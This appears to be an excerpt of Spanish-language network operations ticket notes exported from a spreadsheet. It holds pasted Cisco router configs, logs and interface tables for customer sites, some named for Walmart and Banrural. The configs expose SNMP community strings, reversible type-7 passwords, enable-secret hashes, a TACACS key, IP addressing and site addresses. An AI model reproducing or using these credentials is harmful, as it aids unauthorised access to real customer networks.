ROUTER OSPF 1
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 REDISTRIBUTE OSPF 160 SUBNETS
 NETWORK 22.96.0.76 0.0.0.3 AREA 0
 DEFAULT-INFORMATION ORIGINATE
 DISTANCE 100
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER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
!
!
SNMP-SERVER COMMUNITY ESCW2KPU RO 97
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
TACACS-SERVER KEY 7 15052B5D090A3930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TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
NTP SERVER 10.142.20.1
NTP SERVER 201.247.152.233 PREFER
NTP SERVER 201.247.152.249
END
IP2094038#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41 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 45 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (16384 BYTES):
JAN  2 12:00:02.667: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
JAN  2 12:00:02.823: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = SECURITYK9 AND LICENSE = SECURITYK9
JAN  2 12:00:02.979: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = DATAK9 AND LICENSE = DATAK9
JUN 16 05:43:19.219: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: INITIALIZED
JUN 16 05:43:19.223: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: ENABLED
JUN 16 05:43:20.063: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN 16 05:43:20.063: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
JUN 16 05:43:21.155: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN 16 05:43:21.155: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
JUN 15 23:43:22.435 GMT: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 05:43:22 UTC THU JUN 16 2022 TO 23:43:22 GMT WED JUN 15 2022, CONFIGURED FROM CONSOLE BY CONSOLE.
JUN 15 23:43:22.499 GMT: %HWIC_SHDSL-5-DSLGROUP_UPDOWN: SHDSL 0/0/0 DSL-GROUP(0) STATE CHANGED TO DOWN.
JUN 15 23:43:23.759 GMT: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
JUN 15 23:43:24.527 GMT: %LINK-5-CHANGED: INTERFACE ATM0/0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUN 15 23:43:24.663 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
JUN 15 23:43:25.551 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
JUN 15 23:43:25.675 GMT: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUN 15 23:43:26.319 GMT: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.1(4)M3, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2011 BY CISCO SYSTEMS, INC.
COMPILED TUE 06-DEC-11 16:02 BY PROD_REL_TEAM
JUN 15 23:43:26.319 GMT: %SNMP-5-COLDSTART: SNMP AGENT ON HOST IP2094038 IS UNDERGOING A COLD START
JUN 15 23:43:26.375 GMT: %AAA-3-BADSERVERTYPEERROR: CANNOT PROCESS ACCOUNTING SERVER TYPE TACACS+ (UNKNOWN)
JUN 15 23:43:26.439 GMT: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
JUN 15 23:43:26.439 GMT: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
JUN 15 23:43:26.439 GMT: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
JUN 15 23:43:26.439 GMT: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
JUN 15 23:43:26.676 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
JUN 15 23:43:27.368 GMT: %PIM-5-DRCHG: DR CHANGE FROM NEIGHBOR 0.0.0.0 TO 10.152.245.83 ON INTERFACE GIGABITETHERNET0/0
JUN 15 23:43:39.156 GMT: %PIM-6-INVALID_RP_JOIN: RECEIVED (*, 225.0.1.2) JOIN FROM 10.152.245.82 FOR INVALID RP 10.76.0.60
JUN 15 23:43:53.436 GMT: %PIM-5-NBRCHG: NEIGHBOR 10.152.245.82 UP ON INTERFACE GIGABITETHERNET0/0
JUN 15 23:43:53.564 GMT: %PIM-5-NBRCHG: NEIGHBOR 10.152.245.81 UP ON INTERFACE GIGABITETHERNET0/0
JUN 15 23:44:36.392 GMT: %AAA-3-BADSERVERTYPEERROR: CANNOT PROCESS ACCOUNTING SERVER TYPE TACACS+ (UNKNOWN)
JUN 15 23:45:37.456 GMT: %PIM-6-INVALID_RP_JOIN: RECEIVED (*, 225.0.1.2) JOIN FROM 10.152.245.82 FOR INVALID RP 10.76.0.60
JUN 15 23:45:56.392 GMT: %AAA-3-BADSERVERTYPEERROR: CANNOT PROCESS ACCOUNTING SERVER TYPE TACACS+ (UNKNOWN)
JUN 15 23:45:56.392 GMT: %AAA-3-DROPACCTFAIL: ACCOUNTING RECORD DROPPED, SEND TO SERVER FAILED: SYSTEM
JUN 15 23:46:32.369 GMT: %PIM-5-DRCHG: DR CHANGE FROM NEIGHBOR 0.0.0.0 TO 22.96.0.78 ON INTERFACE GIGABITETHERNET0/1
JUN 15 23:46:34.073 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN 15 23:46:34.073 GMT: %PIM-5-NBRCHG: NEIGHBOR 22.96.0.77 UP ON INTERFACE GIGABITETHERNET0/1
JUN 15 23:46:35.073 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN 15 23:46:39.829 GMT: %OSPF-5-ADJCHG: PROCESS 160, NBR 10.152.245.81 ON GIGABITETHERNET0/0 FROM INIT TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 15 23:46:43.033 GMT: %OSPF-5-ADJCHG: PROCESS 160, NBR 10.152.245.81 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
JUN 15 23:47:16.289 GMT: %OSPF-5-ADJCHG: PROCESS 1, NBR 22.96.167.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 15 23:47:25.045 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE TUNNEL0, CHANGED STATE TO UP
JUN 16 04:34:01.111 GMT: %AAA-3-BADSERVERTYPEERROR: CANNOT PROCESS AUTHENTICATION SERVER TYPE TACACS+ (UNKNOWN)
IP2094038#
SHOW CLOCK
04:34:30.564 GMT THU JUN 16 2022
IP2094038#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.152.245.81          11   084F.0AC8.696C  ARPA   GIGABITETHERNET0/0
INTERNET  10.152.245.82          39   7081.0574.DA00  ARPA   GIGABITETHERNET0/0
INTERNET  10.152.245.83           -   5057.A8BF.4BE0  ARPA   GIGABITETHERNET0/0
INTERNET  22.96.0.77             25   70C9.C6F2.B378  ARPA   GIGABITETHERNET0/1
INTERNET  22.96.0.78              -   5057.A8BF.4BE1  ARPA   GIGABITETHERNET0/1
IP2094038#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/IP2094038SV/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
AT0/0/0                        ADMIN DOWN     DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
TU0                            UP             UP
IP2094038#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.152.245.83   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         22.96.0.78      YES NVRAM  UP                    UP
ATM0/0/0                   UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.166.0.236    YES NVRAM  UP                    UP
TUNNEL0                    10.152.245.83   YES UNSET  UP                    UP
IP2094038#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN WALMART 10.152.245.83
  PING 10.152.245.83: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.152.245.83 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.30.90
DISPLAY IP ROUTING-TABLE VPN-INSTANCE WALMART 10.152.245.83
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : WALMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.152.245.83/32  DIRECT  0    0                 0.0.0.0         VLANIF1760			</t>
  </si>
  <si>
    <t>F4603582</t>
  </si>
  <si>
    <t xml:space="preserve">SE VALIDA QUE SE TUVO ARRANQUE EN FRIO EN EL EQUIPO ESO SIGNIFICA QUE SE CAYO LA ENERGIA COMERCIAL DEL LUGAR SE PROCEDE CON CIERRE
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 14 MINUTO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464 UPTIME IS 14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083YB
6 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
255488K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX183083YB
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_0464#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3507 BYTES
!
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_0464
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$T1DK$TMIR6ITE1Z41ZIJVZCVND/
ENABLE PASSWORD 7 044F0E0A08344D
!
NO AAA NEW-MODEL
!
IP CEF
!
!
!
!
!
!
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX183083YB
!
!
USERNAME GESTIONIP SECRET 5 $1$7K55$ENS.CAW0LV2/IOM9QTQEZ/
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.107.171 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/8900656T/_/
 BANDWIDTH 2048
 NO IP ADDRESS
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/0.1
 DESCRIPTION WAN PRINCIPAL/_/8900656T/_/
 BANDWIDTH 5120
 ENCAPSULATION DOT1Q 184
 IP ADDRESS 10.18.122.172 255.255.255.248
 ARP TIMEOUT 300
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
 DUPLEX AUTO
 SPEED AUTO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34.64.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.164.64.126 255.255.255.0
 RATE-LIMIT INPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 NO AUTOSTATE
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.18.122.169
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.134.64.16/29
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
NO CDP RUN
!
!
SNMP-SERVER COMMUNITY MON000475D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION ALDEA CHILOL KM.30 LOTE 55 SAN JUAN SACATEPEQUEZ
SNMP-SERVER ENABLE TRAPS ENTITY-SENSOR THRESHOLD
!
CONTROL-PLANE
!
BRIDGE 1 PROTOCOL IEE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464#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 23 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 23 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 26 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.635: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*JUN 16 06:29:34.619: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*JUN 16 06:29:52.959: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 16 06:29:52.959: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 16 06:29:53.871: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUN 16 06:29:54.119: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN 16 06:29:54.119: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 16 06:29:55.243 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*JUN 16 06:29:56.155 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*JUN 16 06:29:56.219 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*JUN 16 06:29:57.171 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 16 06:29:57.171 UTC: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 16 06:29:57.171 UTC: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 16 06:29:57.171 UTC: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0/2, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 16 06:29:57.171 UTC: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/0/3, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN 16 06:29:57.879 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(4)M6A, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED TUE 15-APR-14 03:31 BY PROD_REL_TEAM
*JUN 16 06:29:57.919 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_BANRURAL_GT_AGENCIA_0464 IS UNDERGOING A COLD START
*JUN 16 06:29:58.559 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*JUN 16 06:29:58.559 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO DOWN
*JUN 16 06:29:58.559 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/2, CHANGED STATE TO DOWN
*JUN 16 06:29:58.563 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/3, CHANGED STATE TO DOWN
*JUN 16 06:29:58.563 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN 16 06:30:00.535 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
CC_BANRURAL_GT_AGENCIA_0464#
SHOW CLOCK
*06:44:05.179 UTC THU JUN 16 2022
CC_BANRURAL_GT_AGENCIA_0464#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.18.122.169           0   B443.2673.0FBE  ARPA   GIGABITETHERNET0/0.1
INTERNET  10.18.122.172           -   F8C2.8840.0DE0  ARPA   GIGABITETHERNET0/0.1
INTERNET  10.134.64.17            -   F8C2.8840.0DE3  ARPA   VLAN1
INTERNET  10.134.64.22            0   F08E.DB17.AA7E  ARPA   VLAN1
INTERNET  10.164.64.126           -   F8C2.8840.0DE3  ARPA   VLAN1
CC_BANRURAL_GT_AGENCIA_0464#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/8900656T/_/
GI0/0.1                        UP             UP       WAN PRINCIPAL/_/8900656T/_/
GI0/1                          ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO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464#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET0/0.1       10.18.122.172   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0/0       UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET0/0/1       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0/2       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0/3       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.212.107.171  YES NVRAM  UP                    UP
VLAN1                      10.164.64.126   YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_0464#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.18.122.172
  PING 10.18.122.172: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.18.122.172 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.13
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.18.122.172
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.18.122.172/32  DIRECT  0    0                 0.0.0.0         VLANIF184			</t>
  </si>
  <si>
    <t>F4603583</t>
  </si>
  <si>
    <t xml:space="preserve">NO SE TIENEN ALARMAS RECIENTEES SE PORCEDE CON CIERRE
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 1 SEMANA.
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.3(3)M3, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 28-MAY-14 05:26 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
CC_GMG_GT_Z2_SAN_PEDRO_SACATEPEQUEZ UPTIME IS 1 WEEK, 2 DAYS, 12 HOURS, 54 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "USBFLASH0:C1900-UNIVERSALK9-MZ.SPA.153-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784GG
6 GIGABIT ETHERNET INTERFACES
3 TERMINAL LINES
2 CELLULAR INTERFACES
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
249840K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1921/K9          FTX184784GG
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
------------------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE                  TECHNOLOGY-PACKAGE
              CURRENT              TYPE           NEXT REBOOT
------------------------------------------------------------------------
IPBASE        IPBASEK9             PERMANENT      IPBASEK9
SECURITY      NONE                 NONE           NONE
DATA          NONE                 NONE           NONE
NTWKESS       NONE                 NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_GMG_GT_Z2_SAN_PEDRO_SACATEPEQUEZ#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3712 BYTES
!
VERSION 15.3
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_GMG_GT_Z2_SAN_PEDRO_SACATEPEQUEZ
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
SECURITY AUTHENTICATION FAILURE RATE 3 LOG
ENABLE SECRET 5 $1$Y.P9$ADFOGFHUZB/.PZBS4DRH5/
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GUA -6 0
!
!
!
!
!
!
!
IP CEF
LOGIN BLOCK-FOR 120 ATTEMPTS 3 WITHIN 60
LOGIN QUIET-MODE ACCESS-CLASS ACCESO
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CHAT-SCRIPT HSPA-R7 "" "AT!SCACT=1,1" TIMEOUT 60 "OK"
!
!
LICENSE UDI PID CISCO1921/K9 SN FTX184784GG
!
!
USERNAME GESTIONIP PASSWORD 7 04552E5118715E454D
!
REDUNDANCY
!
!
CONTROLLER CELLULAR 0/1
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.159.13 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/313900305/_/
 BANDWIDTH 10240
 IP ADDRESS 10.174.141.117 255.255.255.248
 IP VIRTUAL-REASSEMBLY IN
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 186.151.253.197 255.255.255.252
 IP VIRTUAL-REASSEMBLY IN
 RATE-LIMIT INPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP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CELLULAR0/1/0
 NO IP ADDRESS
 ENCAPSULATION SLIP
 DIALER IN-BAND
 DIALER STRING HSPA-R7
!
INTERFACE CELLULAR0/1/1
 NO IP ADDRESS
 ENCAPSULATION SLIP
!
INTERFACE VLAN1
 NO IP ADDRESS
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.174.141.113
!
IP ACCESS-LIST EXTENDED ACCESO
 PERMIT IP 10.0.0.0 0.255.255.255 ANY
 PERMIT IP 190.148.15.192 0.0.0.15 ANY
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION 4 AVENIDA 3-85 ZONA 2 SAN PEDRO SACATEPEQUEZ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0/1/0
 SCRIPT DIALER HSPA-R7
 NO EXEC
LINE 0/1/1
 NO EXEC
LINE VTY 0 4
 ACCESS-CLASS ACCESO IN
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
!
END
CC_GMG_GT_Z2_SAN_PEDRO_SACATEPEQUEZ#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 25 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
